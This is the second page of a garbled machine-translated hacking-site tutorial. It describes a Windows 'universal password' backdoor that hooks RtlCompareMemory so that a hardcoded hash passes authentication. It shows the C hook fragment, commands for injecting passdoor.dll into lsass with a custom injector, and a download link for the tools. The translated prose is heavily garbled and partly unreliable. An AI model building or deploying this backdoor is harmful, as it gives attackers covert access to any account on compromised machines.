Home | hacker invade | crack analyzes | hacker course | Exploit | encryption decipher | network management | System crack | the virus to be related | invades the examination | firewall
You are here: hacking technology > encryption decipher > Content
Hot Articles
Wireless network to crac
Teaches you to use IAT h
Explains the Oracle data
Tries another method exp
Summarizes some encrypti
REG of form and BAT form
Explains the MYSQL passw
Orders with Dos to carry
And uses to some ASC det
Simple does not ask othe
Teaches you to explain f
Manages the encryption k
The password loses regai
Databac Group licensed t
Orders with Dos to untie
Recommend Articles
Orders with Dos to untie
Orders with Dos to carry
The specification explai
And uses to some ASC det
Teaches you to use IAT h
Summarizes some encrypti
Teaches you a few words
Wondrous use DEBUG elimi
The Oracle cryptographic
Teaches you to explain f
Introduces seven kind of
Windows system folder en
Teaches you to hide the
Explains the MYSQL passw
Simple does not ask othe
New Articles
The school engine room f
The violence explains th
Ten explain the network
How teaches you to expla
How teaches you to expla
How teaches you to expla
Manual explains dodges r
Linux various editions'
Several sections ¡°the e
Windows the Vista debark
Encrypts the superior pl
IE7 completes the passwo
DeviceWall 5.0 extends U
60,000 mobile phones lef
TiVi Phone mobile VoIP s
Teaches you to use IAT hook to realize the windows universal code back door(2)
  Add date: 07/10/2008   Publishing date: 07/10/2008   Hits: 42
Total 2 pages, Current page:2, Jump to page:
 

    if (len == 16 && pRtlCompareMemory (PASSWD_HASH, b, len) == 16)
        return 16;
    return pRtlCompareMemory (a, b, len);
}

And pRtlCompareMemory is the global variable, is the true RtlCompareMemory address, PASSWD_HASH is the universal code Hasche.
Uses MyRtlCompareMemory to come hook to fall RtlCompareMemory, might realize the predetermined function.
What if must compare is 16, and the second section of memory directly allows to pass with ours Hasche same that no matter the first section of memory is anything.
Perhaps some friends will ask that you were hook in the msv1_0 module all transferred RtlCompareMemory the place, will not make a mistake?
Felt relieved that where has that skillfully, what must compare is 16 moreover the second section of memory is also entirely alike with ours Hasche?

Wants hook this function to have many methods,
I chose the laziest one kind, IAT hook+dll have poured into.
Therefore I wrote a small tool to pour into dll:DllInject

Code:
C:\Documents and Settings\cly\ tabletop \ bin>InjectDll.exe
InjectDll v0.1
Inject/UnInject a dll file to a process, by cly, at 20080522
Usage:
    InjectDll.exe (- i | - u | - U) pid filename
    - i: Inject
    - u: UnInject once
    - U: UnInject at all

passdoor.dll is must pour into to lsass advancement dll, this dll has realized IAT hook in DllMain, the earth technology, has not pasted very much the code, as soon as on-line searches for a wicker basket.

Then I have written a small tool: pdconfig
Is actually changes in passdoor.dll the Hasche, in order to avoid must trade the password is must translate passdoor.dll.

Application method:

Code:
InjectDll.exe - i pid_of_lsass full_path_of_passdoor.dll

Unloading method:

Code:
InjectDll.exe - U pid_of_lsass full_path_of_passdoor.dll

http://clyfish.googlepages.com/passdoor.rar
Here is in this article is related the tool the sound code as well as translates the good binary file.
And includes InjectDll.exe, passdoor.dll and pdconfig.exe, all codes use MingW gcc4.2.1 to translate.

 
Other pages: : <<Prev * 1 * 2
Prev:And uses to some ASC detail network horse's explaining Next:Summarizes some encryption algorithm

Comment:

Category: Home > encryption decipher
Home